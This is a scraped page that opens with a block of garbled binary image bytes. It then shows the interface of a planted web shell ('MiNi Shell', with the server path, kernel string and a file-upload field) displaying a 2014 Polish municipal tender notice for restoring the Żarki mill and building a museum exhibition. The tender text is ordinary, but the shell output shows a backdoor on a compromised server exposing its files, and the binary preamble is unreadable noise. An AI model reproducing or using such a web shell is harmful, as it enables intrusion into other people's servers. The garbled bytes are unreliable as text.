JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/77370-N-2014.html

<p class="kh_header"><b>Żarki: Odrestaurowanie zachowanego wyposażenia młyna wraz z wykonaniem wystawy stałej</b><br>
<b>Numer ogłoszenia: 77370 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żarki , ul. Kościuszki 15/17, 42-310 Żarki, woj. śląskie, tel. 34 3148036, faks 34 3148036.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zarki.bip.jur.pl/kategorie/przetargi_25</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odrestaurowanie zachowanego wyposażenia młyna wraz z wykonaniem wystawy stałej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: odrestaurowanie zachowanych urządzeń młyna elektrycznego wraz z ich aranżacją scenograficzną oraz zaprojektowanie i wykonanie wystawy stałej w kubaturze odrestaurowanego Starego Młyna.
Zamówienie swoim zakresem obejmuje:
1. Opracowanie, na podstawie Koncepcji Ekspozycji Stary Młyn - Muzeum Rzemiosł Dawnych:
a) szczegółowego scenariusza ekspozycji: urządzeń młyna, treści i narracji wystawy, scenografii oraz rozmieszczenia atrakcji multimedialnych,
b) szczegółowego scenariusza: filmów, animacji, prezentacji, słuchowisk, gier edukacyjnych, zabaw warsztatowych,
c) projektów graficznych: filmów, animacji, prezentacji, gier edukacyjnych,
d) projektu serwisu internetowego,
e) projektu systemu sterowania multimediami i oświetleniem,
f) projektów wykonawczych i rysunków warsztatowych:
- zachowanych urządzeń młyna,
- scenografii przestrzeni ekspozycyjnej, strefy wejścia, poczekalni, szatni, strefy warsztatowej,
oraz sal ekspozycyjnych,
- instalacji urządzeń audiowizualnych,
2. Renowację, wykonanie, dostawę i montaż, na podstawie przygotowanych przez Wykonawcę i zatwierdzonych przez Zamawiającego do realizacji projektów wykonawczych:
a) zachowanych urządzeń młyna,
b) elementów scenografii i aranżacji wnętrz:
- elementy scenograficzne: sale ekspozycyjne, strefa wejścia, poczekalnia, szatnia, sala warsztatowa,
- warsztaty: chata młynarza, piekarnia, warsztat bednarski, warsztat szewski, warsztat kołodziejski, warsztat szewski,
- gabloty, plansze,
- system informacji i identyfikacji wizualnej,
b) mebli: krzeseł, stołów, biurek, szaf, lady recepcyjnej, szafek ubraniowych, wieszaków szatniowych,
c) stanowisk instalacji edukacyjnych: interaktywnych, multimedialnych (różnogabarytowych),
d) instalacji teletechnicznych oraz instalacji elektrycznych dla potrzeb urządzeń i sprzętu multimedialnego, teletechnicznego, oświetlenia,
e) urządzeń oraz sprzętu multimedialnego i teletechnicznego.
3. Wykonanie, na podstawie przygotowanych przez Wykonawcę i zatwierdzonych przez Zamawiającego do realizacji szczegółowych scenariuszy i projektów:
a)	filmów,
b)	animacji i prezentacji multimedialnych,
c)	gier edukacyjnych,
d)	słuchowisk,
e)	systemu informacji i identyfikacji wizualnej,
f)	strony internetowej,
4. Opracowanie i zakup wraz z dostawą i instalacja z uruchomieniem i testami oprogramowania: do zarządzania urządzeniami AV, oświetleniem.
5. Wykonanie dokumentacji powykonawczej.
6. Udzielenie gwarancji na zasadach opisanych w Specyfikacji istotnych warunków zamówienia i serwis w okresie gwarancji.
7. Przeprowadzenie szkoleń dla pracowników Zamawiającego w zakresie obsługi i bieżącej konserwacji zainstalowanych urządzeń, sprzętu i systemu sterowania.
8. Opracowanie i dostarczenie instrukcji w zakresie bieżącej konserwacji urządzeń, sprzętu i systemu sterowania.
Obiekt stanowić ma funkcjonalną całość i gwarantować kompletną obsługę zwiedzających. Mieścić będzie pomieszczenia:
- strefę wejścia, poczekalnię, szatnię,
- trzy sale ekspozycyjne,
- salę warsztatową,
- pomieszczenia techniczne dla ekspozycji.
Ekspozycja będzie podzielona na strefy tematyczne:
1) Stary Młyn,
2) Chata młynarza,
3) Piekarnia,
4) Warsztat bednarza,
5) Warsztat kołodzieja,
6) Warsztat szewca,
7) Historia Żarek
Oczekuje się od Wykonawcy:
- wysokiego poziomu merytorycznego i technologicznego ekspozycji,
- zastosowania innowacyjnych rozwiązań multimedialnych, informatycznych, elektronicznych,
- profesjonalizmu i nowatorstwa w zakresie wykonania instalacji interaktywnych, kontentów multimedialnych, aranżacji, metod przekazu wiedzy, systemów zarządzania ekspozycją.
Parametry techniczne:
Obiekt ma powierzchnię 500 m2
Przedmiot zamówienia należy wykonać zgodnie z wytycznymi zawartymi w Koncepcji Ekspozycji Stary Młyn - Muzeum Rzemiosł Dawnych stanowiącym Załącznik nr 10 do Specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 32.32.20.00-6, 32.32.12.00-1, 72.21.25.20-0, 71.31.41.00-3, 51.11.00.00-6, 79.93.00.00-2, 79.93.10.00-9, 79.93.20.00-6, 79.93.30.00-3, 79.93.40.00-0, 48.78.00.00-9, 39.15.00.00-5, 32.34.24.10-9, 39.15.40.00-6, 92.11.00.00-5, 92.31.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 20 000 zł (słownie: dwadzieścia tysięcy złotych)
2. Wadium należy wnieść w terminie do dnia 24.03.2014r do godz. 10:00.
3. W przypadku wniesienia wadium w innej formie niż pieniądz dokument należy złożyć w kasie Urzędu Miasta i Gminy Żarki pok. 16 z zachowaniem określonego wyżej terminu.
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu - przelewem na rachunek bankowy Zamawiającego: MBS Myszków O/Żarki 51 8279 1036 0400 0016 2004 0002 liczy się data wpływu środków na konto Zamawiającego);
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. nr 472, poz. 275).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia, a w szczególności Wykonawcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali:
a) co najmniej dwa zamówienia polegające na zaprojektowaniu wystawy stałej o charakterze muzealnym w obiekcie kubaturowym o powierzchni wystawy nie mniejszej niż 500 m2 - jako wystawę stałą rozumieć należy wystawę o założonym okresie eksploatacji nie krótszym niż 1 rok;
b) co najmniej dwa zamówienia obejmujące swoim zakresem dostawę i montaż wraz z uruchomieniem systemów audiowizualnych dla ekspozycji o charakterze muzealnym, po minimum 8 stanowisk multimedialnych każde; 
c) co najmniej dwa zamówienia polegające na wykonaniu treści multimedialnych o wartości nie mniejszej niż 300.000 PLN netto; jako treści multimedialny rozumie się treści takie jak filmy, słuchowiska, animacje, prezentacje.
d) co najmniej jedno zamówienie obejmujące swoim zakresem działający serwis internetowy wraz z systemem zarządzania treścią o wartości niemniejszej niż 10.000 PLN netto
2. Dopuszcza się wykonanie wymienionych powyżej w lit. a), b), c), d) usług / dostaw w ramach jednego zamówienia lub kilku zamówień.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, tj. osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają odpowiednie doświadczenie, w szczególności:
a) osoba odpowiedzialna za przygotowanie scenariusza ekspozycji - posiada odpowiednie doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert opracowała lub brała udział, jako współautor, w opracowaniu scenariusza wystawy stałej o powierzchni wystawy nie mniejszej niż 500 m2, w skład której to wystawy wchodziły takie elementy jak: systemy multimedialne, instalacje edukacyjne - jako wystawę stałą rozumieć należy wystawę o założonym okresie eksploatacji nie krótszym niż 1 rok,
b) osoba odpowiedzialna za wykonanie projektu aranżacji i scenografii - posiada odpowiednie doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert opracowała lub brała udział, jako współautor, w opracowaniu co najmniej jednego projektu aranżacji i scenografii wystawy stałej o powierzchni wystawy nie mniejszej niż 500 m2 - jako wystawę stałą rozumieć należy wystawę o założonym okresie eksploatacji nie krótszym niż 1 rok,
c) osoba odpowiedzialna za koordynację produkcji filmowych do ekspozycji o charakterze muzealnym - posiada odpowiednie doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert nadzorowała tworzenie produkcji filmowych dla przynajmniej 2 ekspozycji
d) osoba odpowiedzialna za grafikę animowaną dla treści multimedialnych - posiada odpowiednie doświadczenie tj. w okresie ostatnich trzech lat przed upływem składania ofert wykonała animacje dla przynajmniej 2 ekspozycji o charakterze muzealnym
e) osoba odpowiedzialna za montaż i uruchomienie sprzętu i urządzeń AV - posiada odpowiednie doświadczenie tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert nadzorowała montaż i uruchomienie urządzeń oraz systemów audiowizualnych dla przynajmniej 2 ekspozycji o charakterze muzealnym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełniają warunek dotyczący sytuacji ekonomicznej i finansowej, a w szczególności:
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 500.000,00 PLN zł (słownie: pięćset tysięcy). W przypadku wartości wyrażonych w walucie obcej, do jej przeliczenia Zamawiający zastosuje kurs według Tabeli kursów średnich NBP z daty wystawienia dokumentu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Walory artystyczne, funkcjonalne, poznawcze i edukacyjne ekspozycji oraz potencjał marketingowy - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić wyłącznie na warunkach określonych w ust. 2 niniejszego paragrafu, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.
2. Strony mogą zmienić postanowienia zawartej umowy w następujących okolicznościach:
a) w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT). Wówczas zmienione zostanie wynagrodzenie Wykonawcy określone w § 5 ust. 1 niniejszej umowy, stosownie do obowiązującej stawki  podatku VAT,
b) termin realizacji zadania może ulec zmianie w przypadkach, na które Zamawiający bądź Wykonawca nie mógł mieć wpływu:
- wystąpienia działania siły wyższej,
- nadzwyczajnych zdarzeń ,
- zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy
3. Przewidziane powyżej okoliczności stanowiące podstawę zmiany umowy są uprawnieniem Zamawiającego, nie jego obowiązkiem.
4. Nie  stanowi zmiany umowy, w rozumieniu art. 144 ustawy prawo zamówień publicznych, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy, zmiana danych teleadresowych, zmiana osób wskazanych do kontaktu między stronami.
5. Strony zgodnie akceptują możliwość  zmiany terminu wykonania Umowy, polegającej na wydłużeniu terminu jej wykonania z przyczyn leżących po stronie Zamawiającego, w tym zmiany terminu rozliczenia dotacji udzielonej Zamawiającemu z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zarki.bip.jur.pl/kategorie/przetargi_25<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Żarki, ul. Kościuszki 15/17, 42-310 Żarki, pok. nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy Żarki, ul. Kościuszki 15/17, 42-310 Żarki, pok. nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Muzeum Dawnych Rzemiosł w Starym Młynie w Żarkach współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com